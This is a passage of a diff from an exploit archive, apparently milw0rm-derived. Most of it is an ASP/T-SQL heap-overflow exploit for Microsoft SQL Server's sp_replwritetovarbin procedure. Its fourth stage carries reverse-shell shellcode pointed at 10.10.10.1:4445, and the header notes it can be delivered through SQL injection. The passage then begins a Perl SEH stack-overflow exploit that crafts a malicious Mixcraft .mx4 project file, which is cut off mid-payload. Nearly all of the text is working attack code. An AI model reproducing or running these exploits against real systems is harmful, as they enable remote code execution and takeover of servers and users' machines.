-"SET @val = CHAR(0x41)						"&_
-"SET @counter = 0						"&_
-"WHILE @counter < 3097						"&_
-"BEGIN								"&_
-"  SET @counter = @counter + 1					"&_
-"  IF @counter = 2900						"&_	 
-"  BEGIN							"&_
-"    SET @val =  CHAR(0x43)					"&_
-"  END								"&_
-"  ELSE IF @counter = 299					"&_
-"  BEGIN							"&_
-"    SET @val =  CHAR(0x42)					"&_
-"  END								"&_
-"  ELSE IF @counter = 300					"&_
-"  BEGIN							"&_
-
-
-"     /* Second byte overwritten here */			"&_
-"     SET @buf = @buf + CHAR(0x45) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
-"     CONTINUE							"&_
-"  END								"&_
-"  SET @buf = @buf + @val					"&_
-"END								"&_
-"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_
-"EXEC master..sp_executesql @buf"							
-
-
-
-
-
-// ########################################### THIRD QUERY
-SQL3 = "DECLARE @buf NVARCHAR(4000),				"&_
-"@val NVARCHAR(4),						"&_
-"@counter INT							"&_
-"SET @buf = '							"&_ 
-"declare @retcode int,						"&_
-"@end_offset int,						"&_
-"@vb_buffer varbinary,						"&_
-"@vb_bufferlen int						"&_  
-"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
-"SET @val = CHAR(0x41)						"&_
-"SET @counter = 0						"&_
-"WHILE @counter < 3021						"&_
-"BEGIN								"&_
-"  SET @counter = @counter + 1					"&_
-"  IF @counter = 2900						"&_	 
-"  BEGIN							"&_
-"    SET @val =  CHAR(0x43)					"&_
-"  END								"&_
-"  ELSE IF @counter = 299					"&_
-"  BEGIN							"&_
-"    SET @val =  CHAR(0x42)					"&_
-"  END								"&_
-"  ELSE IF @counter = 300					"&_
-"  BEGIN							"&_
-
-
-"     /* Third byte overwritten here */				"&_
-"     SET @buf = @buf + CHAR(0x46) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
-"     CONTINUE							"&_
-"  END								"&_
-"  SET @buf = @buf + @val					"&_
-"END								"&_
-"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_
-"EXEC master..sp_executesql @buf"							
-
-
-
-
-
-// ########################################### FOURTH QUERY
-SQL4 = "DECLARE @buf NVARCHAR(4000),				"&_
-"@val NVARCHAR(4),						"&_
-"@counter INT							"&_
-"SET @buf = '							"&_ 
-"declare @retcode int,						"&_
-"@end_offset int,						"&_
-"@vb_buffer varbinary,						"&_
-"@vb_bufferlen int						"&_  
-"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
-"SET @val = CHAR(0x41)						"&_
-"SET @counter = 0						"&_
-"WHILE @counter < 2708						"&_
-"BEGIN								"&_
-"  SET @counter = @counter + 1					"&_
-"  IF @counter = 2900						"&_	 
-"  BEGIN							"&_
-"    SET @val =  CHAR(0x43)					"&_
-"  END								"&_
-"  IF @counter = 108						"&_
-"  BEGIN							"&_
-
-
-"     /* this is the pointer we wrote - 0x38. It points to a CALL ECX */	"&_
-"    SET @buf = @buf + CHAR(0x10) + CHAR(0xc0) + CHAR(0x4c) + CHAR(0x19) "&_
-
-
-"     /* realign code */						"&_
-"    SET @buf = @buf + CHAR(0xe1)				"&_
-
-
-"     /* realign the stack */					"&_
-"    SET @buf = @buf + CHAR(0x83) + CHAR(0xe4) + CHAR(0xfc)	"&_
-
-
-"     /* jump ahead */						"&_
-"    SET @buf = @buf + CHAR(0xe9) + CHAR(0xba) + CHAR(0x00) + CHAR(0x00) + CHAR(0x00) "&_
-"    SET @counter = @counter + 12				"&_
-"    CONTINUE							"&_
-"  END								"&_
-"  ELSE IF @counter = 299					"&_
-"  BEGIN							"&_
-"    SET @val =  CHAR(0x42)					"&_
-"  END								"&_
-"  ELSE IF @counter = 300					"&_
-"  BEGIN							"&_
-
-
-"     /* Fourth byte overwritten here */			"&_
-"     SET @buf = @buf + CHAR(0x47) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
-
-
-"     /* reverse shell on 10.10.10.1:4445 */			"&_
-"     SET @buf=@buf+CHAR(0xfc)+CHAR(0x6a)+CHAR(0xeb)+CHAR(0x4d)+CHAR(0xe8)+CHAR(0xf9)+CHAR(0xff)+CHAR(0xff)+CHAR(0xff)+CHAR(0x60)+CHAR(0x8b)+CHAR(0x6c)+CHAR(0x24)+CHAR(0x24)+CHAR(0x8b)+CHAR(0x45)+CHAR(0x3c)+CHAR(0x8b)+CHAR(0x7c)+CHAR(0x05)+CHAR(0x78)+CHAR(0x01)+CHAR(0xef)+CHAR(0x8b)+CHAR(0x4f)+CHAR(0x18)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x20)+CHAR(0x01)+CHAR(0xeb)+CHAR(0x49)+CHAR(0x8b)+CHAR(0x34)+CHAR(0x8b)+CHAR(0x01)+CHAR(0xee)+CHAR(0x31)+CHAR(0xc0)+CHAR(0x99)+CHAR(0xac)+CHAR(0x84)+CHAR(0xc0)+CHAR(0x74)+CHAR(0x07)+CHAR(0xc1)+CHAR(0xca)+CHAR(0x0d)+CHAR(0x01)+CHAR(0xc2)+CHAR(0xeb)+CHAR(0xf4)+CHAR(0x3b)+CHAR(0x54)+CHAR(0x24)+CHAR(0x28)+CHAR(0x75)+CHAR(0xe5)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x24)+CHAR(0x01)+CHAR(0xeb)+CHAR(0x66)+CHAR(0x8b)+CHAR(0x0c)+CHAR(0x4b)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x1c)+CHAR(0x01)+CHAR(0xeb)+CHAR(0x03)+CHAR(0x2c)+CHAR(0x8b)+CHAR(0x89)+CHAR(0x6c)+CHAR(0x24)+CHAR(0x1c)+CHAR(0x61)+CHAR(0xc3)+CHAR(0x31)+CHAR(0xdb)+CHAR(0x64)+CHAR(0x8b)+CHAR(0x43)+CHAR(0x30)+CHAR(0x8b)+CHAR(0x40)+CHAR(0x0c)+CHAR(0x8b)+CHAR(0x70)+CHAR(0x1c)+CHAR(0xad)+CHAR(0x8b)+CHAR(0x40)+CHAR(0x08)+CHAR(0x5e)+CHAR(0x68)+CHAR(0x8e)+CHAR(0x4e)+CHAR(0x0e)+CHAR(0xec)+CHAR(0x50)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x66)+CHAR(0x53)+CHAR(0x66)+CHAR(0x68)+CHAR(0x33)+CHAR(0x32)+CHAR(0x68)+CHAR(0x77)+CHAR(0x73)+CHAR(0x32)+CHAR(0x5f)+CHAR(0x54)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xcb)+CHAR(0xed)+CHAR(0xfc)+CHAR(0x3b)+CHAR(0x50)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x5f)+CHAR(0x89)+CHAR(0xe5)+CHAR(0x66)+CHAR(0x81)+CHAR(0xed)+CHAR(0x08)+CHAR(0x02)+CHAR(0x55)+CHAR(0x6a)+CHAR(0x02)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xd9)+CHAR(0x09)+CHAR(0xf5)+CHAR(0xad)+CHAR(0x57)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x53)+CHAR(0x53)+CHAR(0x53)+CHAR(0x53)+CHAR(0x43)+CHAR(0x53)+CHAR(0x43)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0x0a)+CHAR(0x0a)+CHAR(0x0a)+CHAR(0x01)+CHAR(0x66)+CHAR(0x68)+CHAR(0x11)+CHAR(0x5d)+CHAR(0x66)+CHAR(0x53)+CHAR(0x89)+CHAR(0xe1)+CHAR(0x95)+CHAR(0x68)+CHAR(0xec)+CHAR(0xf9)+CHAR(0xaa)+CHAR(0x60)+CHAR(0x57)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x6a)+CHAR(0x10)+CHAR(0x51)+CHAR(0x55)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x66)+CHAR(0x6a)+CHAR(0x64)+CHAR(0x66)+CHAR(0x68)+CHAR(0x63)+CHAR(0x6d)+CHAR(0x6a)+CHAR(0x50)+CHAR(0x59)+CHAR(0x29)+CHAR(0xcc)+CHAR(0x89)+CHAR(0xe7)+CHAR(0x6a)+CHAR(0x44)+CHAR(0x89)+CHAR(0xe2)+CHAR(0x31)+CHAR(0xc0)+CHAR(0xf3)+CHAR(0xaa)+CHAR(0x95)+CHAR(0x89)+CHAR(0xfd)+CHAR(0xfe)+CHAR(0x42)+CHAR(0x2d)+CHAR(0xfe)+CHAR(0x42)+CHAR(0x2c)+CHAR(0x8d)+CHAR(0x7a)+CHAR(0x38)+CHAR(0xab)+CHAR(0xab)+CHAR(0xab)+CHAR(0x68)+CHAR(0x72)+CHAR(0xfe)+CHAR(0xb3)+CHAR(0x16)+CHAR(0xff)+CHAR(0x75)+CHAR(0x28)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x5b)+CHAR(0x57)+CHAR(0x52)+CHAR(0x51)+CHAR(0x51)+CHAR(0x51)+CHAR(0x6a)+CHAR(0x01)+CHAR(0x51)+CHAR(0x51)+CHAR(0x55)+CHAR(0x51)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xad)+CHAR(0xd9)+CHAR(0x05)+CHAR(0xce)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x6a)+CHAR(0xff)+CHAR(0xff)+CHAR(0x37)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xe7)+CHAR(0x79)+CHAR(0xc6)+CHAR(0x79)+CHAR(0xff)+CHAR(0x75)+CHAR(0x04)+CHAR(0xff)+CHAR(0xd6)+CHAR(0xff)+CHAR(0x77)+CHAR(0xfc)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xef)+CHAR(0xce)+CHAR(0xe0)+CHAR(0x60)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd6)		"&_
-"     CONTINUE							"&_
-"  END								"&_
-"  SET @buf = @buf + @val					"&_
-"END								"&_
-"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_
-"EXEC master..sp_executesql @buf"							
-
-
-Set oConnection = Server.CreateObject("ADODB.Connection")
-oConnection.Open "Provider=SQLOLEDB; Data Source=; Initial Catalog=; User ID=" & UserName & "; Password=" & Password
-Set rs = Server.CreateObject("ADODB.Recordset")
-
-phase = Request.Querystring("p")
-
-if phase then
-	if phase = 1 then
-		rs.open SQL3, oConnection
-		rs.close
-		oConnection.Close
-		Set oConnection = Nothing
-		Response.Redirect("sql-exploit.asp?p=2")
-	elseif phase = 2 then
-		rs.open SQL4, oConnection
-		rs.close
-		oConnection.Close
-		Set oConnection = Nothing
-		Response.Redirect("sql-exploit.asp?p=3")
-	end if
-Else
-	rs.open SQL, oConnection
-	rs.close
-	oConnection.Close
-	Set oConnection = Nothing
-	
-	Set oConnection = Server.CreateObject("ADODB.Connection")
-	oConnection.Open "Provider=SQLOLEDB; Data Source=; Initial Catalog=; User ID=" & UserName & "; Password=" & Password
-	Set rs = Server.CreateObject("ADODB.Recordset")
-	rs.open SQL2, oConnection
-	rs.close
-	oConnection.Close
-	Set oConnection = Nothing	
-
-	Response.Redirect("sql-exploit.asp?p=1")
-end if
-
-
-%>
-
-
-</html>
-
-# milw0rm.com [2008-12-17]
+<html>
+<%
+// k`sOSe 12/17/2008
+// Microsoft SQL Server "sp_replwritetovarbin()" Heap Overflow
+// Tested on Win2k SP4 with MSSQL 2000(on one box only!).
+// Shellcode is a slightly modified metasploit reverse shell(on 10.10.10.1 port 4445),
+// the change allows multiple shots :)
+// 
+// You need a valid SQL account, but you can also use this through an SQL-Injection simply by injecting the T-SQL stuff.
+
+// Take a look at the comments in T-SQL
+
+
+
+On Error Resume Next
+
+// change this
+UserName = "r00t"
+Password = "t00r"
+
+// ########################################### FIRST QUERY
+SQL = "DECLARE @buf NVARCHAR(4000),				"&_
+"@val NVARCHAR(4),						"&_
+"@counter INT							"&_
+"SET @buf = '							"&_ 
+"declare @retcode int,						"&_
+"@end_offset int,						"&_
+"@vb_buffer varbinary,						"&_
+"@vb_bufferlen int						"&_  
+"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
+"SET @val = CHAR(0x41)						"&_
+"SET @counter = 0						"&_
+"WHILE @counter < 3020						"&_
+"BEGIN								"&_
+"  SET @counter = @counter + 1					"&_
+"  IF @counter = 2900						"&_	 
+"  BEGIN							"&_
+"    SET @val =  CHAR(0x43)					"&_
+"  END								"&_
+"  ELSE IF @counter = 299					"&_
+"  BEGIN							"&_
+"    SET @val =  CHAR(0x42)					"&_
+"  END								"&_
+"  ELSE IF @counter = 300					"&_
+"  BEGIN							"&_
+
+
+"     /* First byte overwritten here. This is a random writable address */	"&_
+"     SET @buf = @buf + CHAR(0x44) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
+"     CONTINUE							"&_
+"  END								"&_
+"  SET @buf = @buf + @val					"&_
+"END								"&_
+"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_
+"EXEC master..sp_executesql @buf"							
+
+
+
+
+
+// ########################################### SECOND QUERY
+SQL2 = "DECLARE @buf NVARCHAR(4000),				"&_
+"@val NVARCHAR(4),						"&_
+"@counter INT							"&_
+"SET @buf = '							"&_ 
+"declare @retcode int,						"&_
+"@end_offset int,						"&_
+"@vb_buffer varbinary,						"&_
+"@vb_bufferlen int						"&_  
+"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
+"SET @val = CHAR(0x41)						"&_
+"SET @counter = 0						"&_
+"WHILE @counter < 3097						"&_
+"BEGIN								"&_
+"  SET @counter = @counter + 1					"&_
+"  IF @counter = 2900						"&_	 
+"  BEGIN							"&_
+"    SET @val =  CHAR(0x43)					"&_
+"  END								"&_
+"  ELSE IF @counter = 299					"&_
+"  BEGIN							"&_
+"    SET @val =  CHAR(0x42)					"&_
+"  END								"&_
+"  ELSE IF @counter = 300					"&_
+"  BEGIN							"&_
+
+
+"     /* Second byte overwritten here */			"&_
+"     SET @buf = @buf + CHAR(0x45) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
+"     CONTINUE							"&_
+"  END								"&_
+"  SET @buf = @buf + @val					"&_
+"END								"&_
+"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_
+"EXEC master..sp_executesql @buf"							
+
+
+
+
+
+// ########################################### THIRD QUERY
+SQL3 = "DECLARE @buf NVARCHAR(4000),				"&_
+"@val NVARCHAR(4),						"&_
+"@counter INT							"&_
+"SET @buf = '							"&_ 
+"declare @retcode int,						"&_
+"@end_offset int,						"&_
+"@vb_buffer varbinary,						"&_
+"@vb_bufferlen int						"&_  
+"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
+"SET @val = CHAR(0x41)						"&_
+"SET @counter = 0						"&_
+"WHILE @counter < 3021						"&_
+"BEGIN								"&_
+"  SET @counter = @counter + 1					"&_
+"  IF @counter = 2900						"&_	 
+"  BEGIN							"&_
+"    SET @val =  CHAR(0x43)					"&_
+"  END								"&_
+"  ELSE IF @counter = 299					"&_
+"  BEGIN							"&_
+"    SET @val =  CHAR(0x42)					"&_
+"  END								"&_
+"  ELSE IF @counter = 300					"&_
+"  BEGIN							"&_
+
+
+"     /* Third byte overwritten here */				"&_
+"     SET @buf = @buf + CHAR(0x46) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
+"     CONTINUE							"&_
+"  END								"&_
+"  SET @buf = @buf + @val					"&_
+"END								"&_
+"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_
+"EXEC master..sp_executesql @buf"							
+
+
+
+
+
+// ########################################### FOURTH QUERY
+SQL4 = "DECLARE @buf NVARCHAR(4000),				"&_
+"@val NVARCHAR(4),						"&_
+"@counter INT							"&_
+"SET @buf = '							"&_ 
+"declare @retcode int,						"&_
+"@end_offset int,						"&_
+"@vb_buffer varbinary,						"&_
+"@vb_bufferlen int						"&_  
+"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
+"SET @val = CHAR(0x41)						"&_
+"SET @counter = 0						"&_
+"WHILE @counter < 2708						"&_
+"BEGIN								"&_
+"  SET @counter = @counter + 1					"&_
+"  IF @counter = 2900						"&_	 
+"  BEGIN							"&_
+"    SET @val =  CHAR(0x43)					"&_
+"  END								"&_
+"  IF @counter = 108						"&_
+"  BEGIN							"&_
+
+
+"     /* this is the pointer we wrote - 0x38. It points to a CALL ECX */	"&_
+"    SET @buf = @buf + CHAR(0x10) + CHAR(0xc0) + CHAR(0x4c) + CHAR(0x19) "&_
+
+
+"     /* realign code */						"&_
+"    SET @buf = @buf + CHAR(0xe1)				"&_
+
+
+"     /* realign the stack */					"&_
+"    SET @buf = @buf + CHAR(0x83) + CHAR(0xe4) + CHAR(0xfc)	"&_
+
+
+"     /* jump ahead */						"&_
+"    SET @buf = @buf + CHAR(0xe9) + CHAR(0xba) + CHAR(0x00) + CHAR(0x00) + CHAR(0x00) "&_
+"    SET @counter = @counter + 12				"&_
+"    CONTINUE							"&_
+"  END								"&_
+"  ELSE IF @counter = 299					"&_
+"  BEGIN							"&_
+"    SET @val =  CHAR(0x42)					"&_
+"  END								"&_
+"  ELSE IF @counter = 300					"&_
+"  BEGIN							"&_
+
+
+"     /* Fourth byte overwritten here */			"&_
+"     SET @buf = @buf + CHAR(0x47) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
+
+
+"     /* reverse shell on 10.10.10.1:4445 */			"&_
+"     SET @buf=@buf+CHAR(0xfc)+CHAR(0x6a)+CHAR(0xeb)+CHAR(0x4d)+CHAR(0xe8)+CHAR(0xf9)+CHAR(0xff)+CHAR(0xff)+CHAR(0xff)+CHAR(0x60)+CHAR(0x8b)+CHAR(0x6c)+CHAR(0x24)+CHAR(0x24)+CHAR(0x8b)+CHAR(0x45)+CHAR(0x3c)+CHAR(0x8b)+CHAR(0x7c)+CHAR(0x05)+CHAR(0x78)+CHAR(0x01)+CHAR(0xef)+CHAR(0x8b)+CHAR(0x4f)+CHAR(0x18)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x20)+CHAR(0x01)+CHAR(0xeb)+CHAR(0x49)+CHAR(0x8b)+CHAR(0x34)+CHAR(0x8b)+CHAR(0x01)+CHAR(0xee)+CHAR(0x31)+CHAR(0xc0)+CHAR(0x99)+CHAR(0xac)+CHAR(0x84)+CHAR(0xc0)+CHAR(0x74)+CHAR(0x07)+CHAR(0xc1)+CHAR(0xca)+CHAR(0x0d)+CHAR(0x01)+CHAR(0xc2)+CHAR(0xeb)+CHAR(0xf4)+CHAR(0x3b)+CHAR(0x54)+CHAR(0x24)+CHAR(0x28)+CHAR(0x75)+CHAR(0xe5)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x24)+CHAR(0x01)+CHAR(0xeb)+CHAR(0x66)+CHAR(0x8b)+CHAR(0x0c)+CHAR(0x4b)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x1c)+CHAR(0x01)+CHAR(0xeb)+CHAR(0x03)+CHAR(0x2c)+CHAR(0x8b)+CHAR(0x89)+CHAR(0x6c)+CHAR(0x24)+CHAR(0x1c)+CHAR(0x61)+CHAR(0xc3)+CHAR(0x31)+CHAR(0xdb)+CHAR(0x64)+CHAR(0x8b)+CHAR(0x43)+CHAR(0x30)+CHAR(0x8b)+CHAR(0x40)+CHAR(0x0c)+CHAR(0x8b)+CHAR(0x70)+CHAR(0x1c)+CHAR(0xad)+CHAR(0x8b)+CHAR(0x40)+CHAR(0x08)+CHAR(0x5e)+CHAR(0x68)+CHAR(0x8e)+CHAR(0x4e)+CHAR(0x0e)+CHAR(0xec)+CHAR(0x50)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x66)+CHAR(0x53)+CHAR(0x66)+CHAR(0x68)+CHAR(0x33)+CHAR(0x32)+CHAR(0x68)+CHAR(0x77)+CHAR(0x73)+CHAR(0x32)+CHAR(0x5f)+CHAR(0x54)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xcb)+CHAR(0xed)+CHAR(0xfc)+CHAR(0x3b)+CHAR(0x50)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x5f)+CHAR(0x89)+CHAR(0xe5)+CHAR(0x66)+CHAR(0x81)+CHAR(0xed)+CHAR(0x08)+CHAR(0x02)+CHAR(0x55)+CHAR(0x6a)+CHAR(0x02)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xd9)+CHAR(0x09)+CHAR(0xf5)+CHAR(0xad)+CHAR(0x57)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x53)+CHAR(0x53)+CHAR(0x53)+CHAR(0x53)+CHAR(0x43)+CHAR(0x53)+CHAR(0x43)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0x0a)+CHAR(0x0a)+CHAR(0x0a)+CHAR(0x01)+CHAR(0x66)+CHAR(0x68)+CHAR(0x11)+CHAR(0x5d)+CHAR(0x66)+CHAR(0x53)+CHAR(0x89)+CHAR(0xe1)+CHAR(0x95)+CHAR(0x68)+CHAR(0xec)+CHAR(0xf9)+CHAR(0xaa)+CHAR(0x60)+CHAR(0x57)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x6a)+CHAR(0x10)+CHAR(0x51)+CHAR(0x55)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x66)+CHAR(0x6a)+CHAR(0x64)+CHAR(0x66)+CHAR(0x68)+CHAR(0x63)+CHAR(0x6d)+CHAR(0x6a)+CHAR(0x50)+CHAR(0x59)+CHAR(0x29)+CHAR(0xcc)+CHAR(0x89)+CHAR(0xe7)+CHAR(0x6a)+CHAR(0x44)+CHAR(0x89)+CHAR(0xe2)+CHAR(0x31)+CHAR(0xc0)+CHAR(0xf3)+CHAR(0xaa)+CHAR(0x95)+CHAR(0x89)+CHAR(0xfd)+CHAR(0xfe)+CHAR(0x42)+CHAR(0x2d)+CHAR(0xfe)+CHAR(0x42)+CHAR(0x2c)+CHAR(0x8d)+CHAR(0x7a)+CHAR(0x38)+CHAR(0xab)+CHAR(0xab)+CHAR(0xab)+CHAR(0x68)+CHAR(0x72)+CHAR(0xfe)+CHAR(0xb3)+CHAR(0x16)+CHAR(0xff)+CHAR(0x75)+CHAR(0x28)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x5b)+CHAR(0x57)+CHAR(0x52)+CHAR(0x51)+CHAR(0x51)+CHAR(0x51)+CHAR(0x6a)+CHAR(0x01)+CHAR(0x51)+CHAR(0x51)+CHAR(0x55)+CHAR(0x51)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xad)+CHAR(0xd9)+CHAR(0x05)+CHAR(0xce)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x6a)+CHAR(0xff)+CHAR(0xff)+CHAR(0x37)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xe7)+CHAR(0x79)+CHAR(0xc6)+CHAR(0x79)+CHAR(0xff)+CHAR(0x75)+CHAR(0x04)+CHAR(0xff)+CHAR(0xd6)+CHAR(0xff)+CHAR(0x77)+CHAR(0xfc)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xef)+CHAR(0xce)+CHAR(0xe0)+CHAR(0x60)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd6)		"&_
+"     CONTINUE							"&_
+"  END								"&_
+"  SET @buf = @buf + @val					"&_
+"END								"&_
+"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_
+"EXEC master..sp_executesql @buf"							
+
+
+Set oConnection = Server.CreateObject("ADODB.Connection")
+oConnection.Open "Provider=SQLOLEDB; Data Source=; Initial Catalog=; User ID=" & UserName & "; Password=" & Password
+Set rs = Server.CreateObject("ADODB.Recordset")
+
+phase = Request.Querystring("p")
+
+if phase then
+	if phase = 1 then
+		rs.open SQL3, oConnection
+		rs.close
+		oConnection.Close
+		Set oConnection = Nothing
+		Response.Redirect("sql-exploit.asp?p=2")
+	elseif phase = 2 then
+		rs.open SQL4, oConnection
+		rs.close
+		oConnection.Close
+		Set oConnection = Nothing
+		Response.Redirect("sql-exploit.asp?p=3")
+	end if
+Else
+	rs.open SQL, oConnection
+	rs.close
+	oConnection.Close
+	Set oConnection = Nothing
+	
+	Set oConnection = Server.CreateObject("ADODB.Connection")
+	oConnection.Open "Provider=SQLOLEDB; Data Source=; Initial Catalog=; User ID=" & UserName & "; Password=" & Password
+	Set rs = Server.CreateObject("ADODB.Recordset")
+	rs.open SQL2, oConnection
+	rs.close
+	oConnection.Close
+	Set oConnection = Nothing	
+
+	Response.Redirect("sql-exploit.asp?p=1")
+end if
+
+
+%>
+
+
+</html>
+
+# milw0rm.com [2008-12-17]
diff --git a/platforms/windows/local/7577.pl b/platforms/windows/local/7577.pl
index 63014c443..b261b9b39 100755
--- a/platforms/windows/local/7577.pl
+++ b/platforms/windows/local/7577.pl
@@ -1,145 +1,145 @@
-#!/usr/bin/perl
-#
-# Acoustica Mixcraft <= 4.2 Universal Stack Overflow Exploit (SEH)
-# ------------------------------------------------------
-# Found/Exploit by SkD (skdrat@hotmail.com)
-#
-# MixCraft Download = http://www.acoustica.com/mixcraft/download.htm
-#
-# A local exploit for the .mx4 project file affecting MixCraft 4.2 (other versions
-# may also work). I knew of this vulnerability since MixCraft 3, so
-# it's time to release a fresh exploit to the public for the latest ver of this
-# software.
-# This exploit also implements the SEH technique to exploit the issue and it
-# works on all Windows versions.
-#
-# Enjoy.
-#
-# Note: Author has no resposibility over the damage you do with this!
-
-use strict;
-use warnings;
-my $mx4_data1 = "\x52\x49\x46\x46\xBC\x14\x00\x00\x4D\x58\x43\x33\x50\x52\x4F\x4A\x60\x0A\x00\x00\xCD\xCC\xCC\xCC\xCC\xCC\xF4\x3F\x41\x41\x41\x41".
-		"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-		"\x41\x41\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-		"\x00\x01".("\x00" x 2320).
-                "\xF0\x3F\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-		"\x00\x00\x4C\x49\x53\x54\x04\x00\x00\x00\x45\x66\x78\x4C\x4D\x61\x72\x6B\x98\x01\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x01\x00".
-		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x53\x74\x61\x72\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
